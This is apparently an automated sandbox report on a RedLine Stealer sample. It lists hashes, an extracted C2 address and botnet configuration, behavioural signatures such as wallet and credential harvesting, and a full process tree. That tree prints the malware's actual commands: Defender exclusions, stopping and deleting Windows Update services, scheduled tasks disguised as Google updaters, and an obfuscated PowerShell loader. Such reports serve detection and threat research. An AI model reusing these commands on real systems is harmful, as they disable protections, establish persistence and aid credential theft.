Analysis

  • max time kernel
    301s
  • max time network
    292s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    01-11-2022 09:09

General

  • Target

    409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe

  • Size

    2.4MB

  • MD5

    c1fe936433eb4be74eef3e7095f42d77

  • SHA1

    b997230735a2a033647425441f908cb906047523

  • SHA256

    409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14

  • SHA512

    e33c1fec65c97cd2c5dabeb460ef83e2102201d9d9cf1c2789b7dfa65e2bb6063b927612a7bfc7eff234fc70ee14802af4fe134b8abeb00c4f6fea2adda8e7a6

  • SSDEEP

    24576:cBqYYgYPXQh8RMpJRh9dM46/uN9X5koyLSAOtSL2SxgCl3RuQ55313V:cBmsIoyLSAOtSll3T

Malware Config

Extracted

Family

redline

Botnet

@mnogokupurbolshoykarman

C2

77.73.134.24:80

Attributes
  • auth_value

    b555cfd27c33c447be45d0969d5f35d8

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:476
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Suspicious behavior: LoadsDriver
      PID:460
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
        2⤵
          PID:808
          • C:\Windows\system32\Dwm.exe
            "C:\Windows\system32\Dwm.exe"
            3⤵
              PID:1180
          • C:\Windows\System32\spoolsv.exe
            C:\Windows\System32\spoolsv.exe
            2⤵
              PID:748
            • C:\Windows\system32\sppsvc.exe
              C:\Windows\system32\sppsvc.exe
              2⤵
                PID:1720
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                2⤵
                  PID:964
                • C:\Windows\system32\taskhost.exe
                  "taskhost.exe"
                  2⤵
                    PID:1116
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                    2⤵
                      PID:1076
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:324
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs
                        2⤵
                        • Drops file in System32 directory
                        • Drops file in Windows directory
                        • Suspicious use of AdjustPrivilegeToken
                        PID:888
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {91FEAAAD-2294-4D2C-8C20-35E1ADAC0A0D} S-1-5-18:NT AUTHORITY\System:Service:
                          3⤵
                          • Loads dropped DLL
                          PID:108
                          • C:\Program Files\Google\Chrome\updater.exe
                            "C:\Program Files\Google\Chrome\updater.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1756
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                              5⤵
                              • Drops file in System32 directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1776
                            • C:\Windows\system32\cmd.exe
                              cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              5⤵
                                PID:1976
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  6⤵
                                  • Launches sc.exe
                                  PID:1652
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  6⤵
                                  • Launches sc.exe
                                  PID:1020
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  6⤵
                                  • Launches sc.exe
                                  PID:1744
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                  6⤵
                                    PID:940
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                    6⤵
                                      PID:1996
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:904
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                      6⤵
                                        PID:1880
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                        6⤵
                                          PID:1016
                                        • C:\Windows\system32\sc.exe
                                          sc stop bits
                                          6⤵
                                          • Launches sc.exe
                                          PID:1016
                                        • C:\Windows\system32\sc.exe
                                          sc stop WaaSMedicSvc
                                          6⤵
                                          • Launches sc.exe
                                          PID:468
                                      • C:\Windows\system32\cmd.exe
                                        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                        5⤵
                                          PID:1320
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -hibernate-timeout-ac 0
                                            6⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:984
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -hibernate-timeout-dc 0
                                            6⤵
                                              PID:904
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -standby-timeout-dc 0
                                              6⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:576
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -standby-timeout-ac 0
                                              6⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1028
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                            5⤵
                                            • Drops file in System32 directory
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:992
                                            • C:\Windows\system32\schtasks.exe
                                              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                              6⤵
                                              • Creates scheduled task(s)
                                              PID:1036
                                          • C:\Windows\system32\cmd.exe
                                            cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                            5⤵
                                            • Drops file in Program Files directory
                                            PID:2036
                                          • C:\Windows\system32\dialer.exe
                                            C:\Windows\system32\dialer.exe xtrjicqmdliu
                                            5⤵
                                              PID:288
                                            • C:\Windows\system32\dialer.exe
                                              C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
                                              5⤵
                                                PID:1608
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              4⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:912
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              4⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1840
                                          • C:\Windows\system32\taskeng.exe
                                            taskeng.exe {CA3EFE89-1A49-49F5-8DC4-60D253EB466E} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
                                            3⤵
                                              PID:1308
                                              • C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
                                                C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
                                                4⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1812
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalService
                                            2⤵
                                              PID:848
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              2⤵
                                                PID:732
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k RPCSS
                                                2⤵
                                                  PID:668
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k DcomLaunch
                                                  2⤵
                                                    PID:588
                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      3⤵
                                                      • Checks processor information in registry
                                                      PID:1560
                                                • C:\Windows\system32\winlogon.exe
                                                  winlogon.exe
                                                  1⤵
                                                    PID:416
                                                    • C:\Windows\System32\dllhost.exe
                                                      C:\Windows\System32\dllhost.exe /Processid:{cf6956f5-5dcf-4fc7-8ea4-c72b3dd5a455}
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1524
                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{74620cbb-874f-48ee-90e3-82ab5c28abfc}
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:832
                                                  • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
                                                    wmiadap.exe /F /T /R
                                                    1⤵
                                                      PID:1596
                                                    • C:\Windows\Explorer.EXE
                                                      C:\Windows\Explorer.EXE
                                                      1⤵
                                                        PID:1268
                                                        • C:\Users\Admin\AppData\Local\Temp\409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe"
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1044
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                            3⤵
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:880
                                                            • C:\Users\Admin\AppData\Local\Microsoft\brave.exe
                                                              "C:\Users\Admin\AppData\Local\Microsoft\brave.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • Drops file in Program Files directory
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1708
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                5⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:860
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                5⤵
                                                                  PID:616
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc stop UsoSvc
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    PID:1960
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc stop dosvc
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    PID:2008
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                    6⤵
                                                                      PID:436
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                      6⤵
                                                                        PID:2012
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                        6⤵
                                                                          PID:1500
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                          6⤵
                                                                          • Modifies security service
                                                                          PID:928
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                          6⤵
                                                                            PID:1948
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc stop bits
                                                                            6⤵
                                                                            • Launches sc.exe
                                                                            PID:952
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc stop wuauserv
                                                                            6⤵
                                                                            • Launches sc.exe
                                                                            PID:1520
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc stop WaaSMedicSvc
                                                                            6⤵
                                                                            • Launches sc.exe
                                                                            PID:1616
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                          5⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:820
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                          5⤵
                                                                            PID:1880
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                                                            5⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2028
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                                                              6⤵
                                                                                PID:980
                                                                            • C:\Windows\system32\dialer.exe
                                                                              C:\Windows\system32\dialer.exe
                                                                              5⤵
                                                                              • Drops file in Windows directory
                                                                              PID:1012
                                                                          • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe
                                                                            "C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1956
                                                                            • C:\Windows\system32\cmd.exe
                                                                              "cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                              5⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1748
                                                                          • C:\Users\Admin\AppData\Local\Microsoft\chrome.exe
                                                                            "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Windows directory
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1212
                                                                            • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                              SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
                                                                              5⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:1496
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 200
                                                                              5⤵
                                                                              • Loads dropped DLL
                                                                              • Program crash
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              PID:1580
                                                                    • C:\Windows\system32\lsm.exe
                                                                      C:\Windows\system32\lsm.exe
                                                                      1⤵
                                                                        PID:484
                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                        SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
                                                                        1⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:1968
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                        1⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1400
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                        1⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:1948
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        powercfg /x -standby-timeout-ac 0
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1624
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        powercfg /x -standby-timeout-dc 0
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1652
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                                        1⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:1544
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        powercfg /x -hibernate-timeout-dc 0
                                                                        1⤵
                                                                          PID:1840
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          powercfg /x -hibernate-timeout-ac 0
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1772
                                                                        • C:\Windows\system32\conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe "2127428439-387115588-474629708-122997410818193653601109513171801454986-1254405721"
                                                                          1⤵
                                                                            PID:1104
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "129070741197830047150433440078180455-1989761494-1466258311-205524086-1249266345"
                                                                            1⤵
                                                                              PID:1860
                                                                            • C:\Windows\system32\conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe "801358140-7435095441584428054-778346473-137592661871822158220689907241436444237"
                                                                              1⤵
                                                                                PID:1616
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic PATH Win32_VideoController GET Name, VideoProcessor
                                                                                1⤵
                                                                                • Modifies data under HKEY_USERS
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:628
                                                                              • C:\Windows\system32\conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe "19519342621161056187-2077884082-1871805386-648724425168723342-103605484183994951"
                                                                                1⤵
                                                                                  PID:844
                                                                                • C:\Windows\system32\conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe "-66575895316555899831171798690-484516680-11218911-1624779354-19392200241291459998"
                                                                                  1⤵
                                                                                    PID:1844
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                                                    1⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:1632

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v6

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Program Files\Google\Chrome\updater.exe

                                                                                    Filesize

                                                                                    2.8MB

                                                                                    MD5

                                                                                    eb27bb8cfa99d659e4fe023e9002ecd1

                                                                                    SHA1

                                                                                    c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                                                    SHA256

                                                                                    9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                                                    SHA512

                                                                                    ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                                                  • C:\Program Files\Google\Chrome\updater.exe

                                                                                    Filesize

                                                                                    2.8MB

                                                                                    MD5

                                                                                    eb27bb8cfa99d659e4fe023e9002ecd1

                                                                                    SHA1

                                                                                    c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                                                    SHA256

                                                                                    9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                                                    SHA512

                                                                                    ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                                                  • C:\Program Files\Google\Libs\g.log

                                                                                    Filesize

                                                                                    198B

                                                                                    MD5

                                                                                    37dd19b2be4fa7635ad6a2f3238c4af1

                                                                                    SHA1

                                                                                    e5b2c034636b434faee84e82e3bce3a3d3561943

                                                                                    SHA256

                                                                                    8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

                                                                                    SHA512

                                                                                    86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\brave.exe

                                                                                    Filesize

                                                                                    2.8MB

                                                                                    MD5

                                                                                    9253ed091d81e076a3037e12af3dc871

                                                                                    SHA1

                                                                                    ec02829a25b3bf57ad061bbe54180d0c99c76981

                                                                                    SHA256

                                                                                    78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                                                                    SHA512

                                                                                    29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\brave.exe

                                                                                    Filesize

                                                                                    2.8MB

                                                                                    MD5

                                                                                    9253ed091d81e076a3037e12af3dc871

                                                                                    SHA1

                                                                                    ec02829a25b3bf57ad061bbe54180d0c99c76981

                                                                                    SHA256

